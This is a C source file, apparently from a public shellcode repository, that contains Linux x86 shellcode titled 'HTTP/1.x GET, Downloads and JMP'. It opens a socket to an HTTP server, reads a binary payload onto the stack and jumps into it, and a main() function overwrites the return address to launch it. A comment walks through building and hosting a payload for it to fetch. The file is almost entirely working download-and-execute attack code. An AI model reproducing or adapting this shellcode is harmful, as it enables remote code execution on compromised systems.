-
Notifications
You must be signed in to change notification settings - Fork 1
/
shellcode-227.c
executable file
·144 lines (128 loc) · 4.55 KB
/
shellcode-227.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
/* (linux/x86) HTTP/1.x GET, Downloads and JMP - 68 bytes+
*
* This shellcode allows you to download a binary code straight off a standard HTTP server
* and execute it. The downloaded shellcode (e.g. binary code) will be executed on the stack.
*
* <DEMONSTRATION>:
*
* > Starting by creating a very simple shellcode, that will be downloaded and execute.
*
* root@magicbox:/tmp# cat foobar.s
* .section .text
* .global _start
* _start:
*
* movl $0x4, %eax
* movl $0x1, %ebx
*
* call _doint
* .ascii "Hello World!"
* .byte 0xa
* _doint:
* popl %ecx
* movl $0xd, %edx
* int $0x80
*
* movl $0x1, %eax
* int $0x80
*
* # Reverse CALL
* call _start
*
* > The only requirement from the downloaded shellcode, is that it will include a reverse
* CALL to itself. As this shellcode does not parse the HTTP header, it has no way to know
* where the downloaded shellcode begins or ends. Therefor it realys on the downloaded
* shellcode to supply that, by including a CALL in the bottom, which will be JMP into.
*
* > Compile the given shellcode
*
* root@magicbox:/tmp# as -o foobar.o foobar.s
* root@magicbox:/tmp# ld -o foobar foobar.o
*
* > Convert this file into a raw binary (headerless, formatless)
*
* root@magicbox:/tmp# objcopy -O binary foobar foobar.bin
*
* > Host this file, on some HTTP server (I haved used Apache/1.3.34)
*
* > Use gen_httpreq.c to generate a URL request (e.g. /foobar.bin)
*
* > Paste the gen_httpreq.c output, into this shellcode at the marked place.
*
* > Compile this shellcode w/ the gen_httpreq output in it.
*
* > Execute this shellcode
*
* root@magicbox:/tmp# gcc -o http-download-jmp http-download-jmp.c
* root@magicbox:/tmp# ./http-download-jmp
* Hello World!
* root@magicbox:/tmp#
*
* <LINKS/UTILITIES>:
*
* gen_httpreq.c, generates a HTTP GET request for this shellcode
* > http://www.tty64.org/shellcode/utilities/gen_httpreq.c
*
* - izik <[email protected]>
*/
char shellcode[] =
"\x6a\x66" // push $0x66
"\x58" // pop %eax
"\x99" // cltd
"\x6a\x01" // push $0x1
"\x5b" // pop %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x6a\x02" // push $0x2
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80" // int $0x80
"\x5b" // pop %ebx
"\x5d" // pop %ebp
//
"\xbe\x80\xff\xff\xfe" // mov $0xfeffff80,%esi
// (0x0xfeffff80 = ~127.0.0.1)
//
//
"\x66\xbd\x91\x1f" // mov $0x1f91,%bp
// (0x1f91 = 8081/tcp)
//
//
// "\x66\xbd\xaf\xff" // mov $0xffaf, %bp
// // (0xafff = ~0080/tcp)
// "\x66\xf7\xd5" // not %bp
//
"\xf7\xd6" // not %esi
"\x56" // push %esi
"\x0f\xcd" // bswap %ebp
"\x09\xdd" // or %ebx,%ebp
"\x55" // push %ebp
"\x43" // inc %ebx
"\x6a\x10" // push $0x10
"\x51" // push %ecx
"\x50" // push %eax
"\xb0\x66" // mov $0x66,%al
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80" // int $0x80
//
// <paste here the code, that gen_httpreq.c outputs!>
//
"\x89\xe1" // mov %esp,%ecx
"\xb0\x04" // mov $0x4,%al
"\xcd\x80" // int $0x80
//
// <_recv_http_request>:
//
"\xb0\x03" // mov $0x3,%al
"\x6a\x01" // push $0x1
"\x5a" // pop %edx
"\xcd\x80" // int $0x80
"\x41" // inc %ecx
"\x85\xc0" // test %eax,%eax
"\x75\xf4" // jne <_recv_http_request>
"\x83\xe9\x06" // sub $0x6,%ecx
"\xff\xe1"; // jmp *%ecx
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}